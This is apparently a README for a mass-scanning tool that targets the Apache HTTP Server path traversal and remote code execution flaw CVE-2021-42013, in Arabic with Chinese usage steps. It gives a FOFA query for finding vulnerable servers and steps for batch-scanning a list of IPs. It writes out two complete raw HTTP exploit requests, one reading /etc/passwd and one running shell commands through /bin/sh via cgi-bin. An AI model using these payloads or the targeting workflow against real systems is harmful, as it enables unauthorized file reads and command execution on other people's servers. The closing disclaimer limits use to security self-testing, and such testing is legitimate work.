
أداة فحص جماعي لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache (CVE-2021-42013): Apache HTTP Server هو خادم ويب مفتوح المصدر تابع لمؤسسة أباتشي (Apache) الأمريكية. يتميز هذا الخادم بالسرعة والموثوقية وإمكانية التوسع من خلال واجهة برمجة تطبيقات (API) بسيطة. تم اكتشاف أن الإصلاح المقدم لثغرة CVE-2021-41773 في Apache HTTP Server 2.4.50 غير كافٍ. يمكن للمهاجم استخدام هجوم اجتياز المسار (Path Traversal) لتعيين عناوين URL إلى ملفات خارج الدلائل التي تم تكوينها بواسطة توجيهات من نوع الاسم المستعار (Alias). إذا لم تكن هذه الملفات خارج الدلائل محمية بالتهيئة الافتراضية المعتادة "Require all denied"، فمن المحتمل أن تنجح هذه الطلبات. وإذا تم أيضًا تمكين نصوص CGI البرمجية لتلك المسارات المستعارة، فقد يسمح ذلك بتنفيذ التعليمات البرمجية عن بُعد. تؤثر هذه المشكلة على Apache 2.4.49 وApache 2.4.50 فقط، ولا تؤثر على الإصدارات الأقدم.
تنفيذ التعليمات البرمجية عن بُعد في Apache (CVE-2021-42013)
Apache HTTP Server هو خادم ويب مفتوح المصدر تابع لمؤسسة Apache الأمريكية. يتميز بالسرعة والموثوقية وإمكانية التوسع عبر واجهة برمجة تطبيقات بسيطة. تم اكتشاف أن الإصلاح المقدم لـ CVE-2021-41773 في Apache HTTP Server 2.4.50 غير كافٍ. يمكن للمهاجم استخدام هجوم اجتياز المسار لتعيين عنوان URL لملفات خارج الدلائل المكونة بواسطة توجيهات مشابهة للأسماء المستعارة. إذا لم تكن هذه الملفات خارج الدلائل محميةً بالإعداد الافتراضي المعتاد "Require all denied"، فقد تنجح هذه الطلبات. وإذا تم أيضًا تمكين نصوص CGI لهذه المسارات المستعارة، فقد يسمح ذلك بتنفيذ التعليمات البرمجية عن بُعد. تؤثر هذه المشكلة فقط على Apache 2.4.49 وApache 2.4.50، ولا تؤثر على الإصدارات الأقدم.
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
server="Apache/2.4.49" || server="Apache/2.4.50"
1.将准备检测的IP地址放入ip.txt文件中
2.运行python3 check.py
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57
echo Content-Type: text/plain; echo;ls /

تم إصلاح هذه الثغرات حاليًا، ونظرًا لخطورتها، يُنصح المستخدمون المتأثرون بالترقية فورًا إلى Apache HTTP Server 2.4.51 (الذي صدر في 7 أكتوبر) أو إصدار أحدث.
رابط التحميل:
https://httpd.apache.org/download.cgi#apache24
هذه الأداة مخصصة فقط لمختبرِي الأمن لإجراء الفحص الذاتي الأمني. لا يتحمل المؤلف أي عواقب ناتجة عن إساءة الاستخدام. يجب على المستخدمين الالتزام بالقوانين المحلية. لا يجوز استخدام هذا البرنامج لأغراض تجارية، ويقتصر على التعلم والتبادل.
